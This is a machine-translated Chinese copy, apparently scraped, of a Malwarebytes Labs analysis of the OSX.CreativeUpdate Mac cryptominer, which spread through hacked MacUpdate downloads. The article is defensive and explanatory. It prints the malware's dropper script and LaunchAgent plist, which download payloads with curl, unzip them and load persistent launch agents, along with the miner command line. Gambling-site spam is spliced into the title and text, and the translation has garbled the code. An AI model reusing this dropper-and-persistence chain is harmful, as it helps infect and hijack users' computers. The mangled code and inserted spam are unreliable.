新的Mac cryptominer通过MacUpdate黑客发布——Malwarebytes Labs | M必威平台APP必威官方登录备用alwarebytes Labs

今早早些时候，SentinelOne的安全研究员Arnaud Abbati在推特上发布了关于通过MacUpdate分发新的Mac恶意软件的消息。这个被阿巴蒂命名为OSX.CreativeUpdate的恶意软件是一个新的加密货币矿工，它被设计成坐在后台，使用计算机的CPU来挖掘Monero货币。

恶意软件是通过黑客入侵MacUpdate网站传播的，该网站正在分发Firefox、OnyX和更深层应用程序的恶意修改副本。根据MacUpdate网站上每个受影响应用的评论中发布的声明，这发生在2月1日的某个时候。

OnyX和Decever都是由Tianium软件（Titanium Software.fr）生产的产品，但该网站被恶意更改为指向titaniumsoftware.org下载URL。titaniumsoftware.org是于1月23日首次注册的域名，其所有权不明。假冒的Firefox应用程序是从download-installer.cdn-mozilla.net分发的。（请注意，域名以cdn-mozilla.net结尾，这与mozilla.net完全不同。这是一个常见的骗子骗局，让你认为它来自合法网站。）

下载的文件是.dmg（磁盘映像）文件，看起来很有说服力。在每种情况下，都会要求用户将应用程序拖到应用程序文件夹中，这些应用程序的原始非恶意.dmg文件也是如此。

正如阿巴提在推特上所说，这些应用程序本身是由鸭嘴兽，这是一个开发工具，可以从各种脚本(如shell或Python脚本)制作完整的macOS应用程序。这意味着创建这些应用程序的门槛很低。

一旦安装了应用程序，当用户打开它时，它将从public.adobecc.com (Adobe拥有的合法网站)下载并安装有效负载。然后，它试图打开原始应用的副本(被称为诱饵应用，因为它被用来欺骗用户，让他们认为一切正常)，这是包含在恶意应用程序内的。

然而，这并不总是成功的。例如，恶意的OnyX应用程序将运行在Mac OS X 10.7和更高版本，但诱饵OnyX应用程序需要macOS 10.13。这意味着在10.7和10.12之间的任何系统上，恶意软件将运行，但诱饵应用程序不会打开，以掩盖恶意正在进行的事实。在deep应用程序的例子中，黑客们变得更加草率，错误地将一个OnyX应用程序而不是一个更深的应用程序作为诱饵，使其同样失败，但原因更可笑。

应用程序中的“脚本”文件负责打开诱饵应用程序，然后下载并安装恶意软件。

如果[-f~/Library/mdworker/mdworker]，则打开deepher.app；然后killall Deeperd else nohup curl-o~/Library/mdworker.ziphttps://public.adobecc.com/files/1U14RSV3MVAHBMEGVS4LZ42AFNYEFF? content\u disposition=attachment&&unzip-o~/Library/mdworker.zip-d~/Library&&mkdir-p~/Library/LaunchAgents&&mv~/Library/mdworker/MacOSupdate.plist~/Library/LaunchAgents&&launchctl load-w~/Library/LaunchAgents/MacOSupdate.plist&&rm-rf~/Library/mdworker.zip&&killall Deeperd&fi

对于那些不能阅读shell脚本的人，此代码首先尝试打开诱饵更深。应用程序，它将失败，因为错误地包含错误的诱饵。接下来，如果恶意软件已经安装，恶意的滴管进程将被杀死，因为安装是不必要的。

如果没有安装恶意软件，它会下载恶意软件并将其解压缩到用户的Library文件夹中，该文件夹默认隐藏在macOS中，所以大多数用户甚至不知道那里添加了什么。它还安装了一个名为MacOSupdate的恶意启动代理文件。Plist，它循环运行另一个脚本。

<？xml version=“1.0”encoding=“UTF-8”><！DOCTYPE plist PUBLIC“-//Apple Computer//DTD plist 1.0//EN”http://www.apple.com/DTDs/PropertyList-1.0.dtd“>LabelMacOSupdateprogrammargumentsshlaunchctl unload-w~/Library/LaunchAgents/MacOS.plist&&rm-rf~/Library/LaunchAgents/MacOS.plist&&curl-o~/Library/LaunchAgents/MacOS.plisthttps://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF? content\u disposition=attachment&&launchctl load-w~/Library/LaunchAgents/MacOS.plist&~/Library/mdworker/mdworkerRunAtLoad

当这个启动代理运行时，它会下载一个新的MacOS。Plist文件并安装它。在此之前，它将删除以前的MacOS。Plist文件，大概是为了用新代码更新它。这个MacOS的版本。我们获得的Plist文件做了真正的工作。

sh -c ~/Library/mdworker/sysmdworker -user walker18@protonmail.ch -xmr . sh说明

这将加载一个恶意的sysmdworker进程，传入几个参数，其中一个是电子邮件地址。

然后，sysmdworker进程将使用名为minergate cli的命令行工具挖掘Monero加密货币，并定期连接到minergate.com，将上述电子邮件地址作为登录名传入。

从中我们可以得到很多启示。首先，永远不要从任何“下载聚合”网站(类似非官方Mac App Store的网站，让你浏览软件)下载软件。这类网站的问题由来已久。以MacUpdate为例，早在2015年，他们就在修改别人的软件，包装在他们自己的广告软件安装程序. 这种情况不再发生，但在2016年，MacUpdate也同样如此用于分发OSX。埃莉诺的恶意软件．

相反，总是直接从开发者网站或Mac应用商店下载软件。这些都不是保证，仍然可以让你感染恶意软件、广告软件或诈骗软件。但你的机会更大。下载前一定要检查软件是否合法，但不要完全相信第三方网站或Mac App Store上的评级或评论，因为这些可能是伪造的。

其次，如果你下载了一个新应用程序，但它似乎没有像预期的那样发挥作用——比如双击它时根本无法打开——那就要怀疑了。考虑用安全软件扫描你的电脑。必威平台APPMac的Malwarebytes将检测此恶意软件为OSX.CreativeUpdater。

最后，请注意，“Mac电脑不会感染病毒”这句古老的格言从未被证明是正确的，但它越来越被证明是错误的。这是今年以来第三个Mac恶意软件，仅次于OSX。麻美和OSX。CrossRAT．这还没有考虑到各种各样的广告软件和垃圾软件。不要让自己相信mac电脑不会被感染，因为那只会让你更脆弱。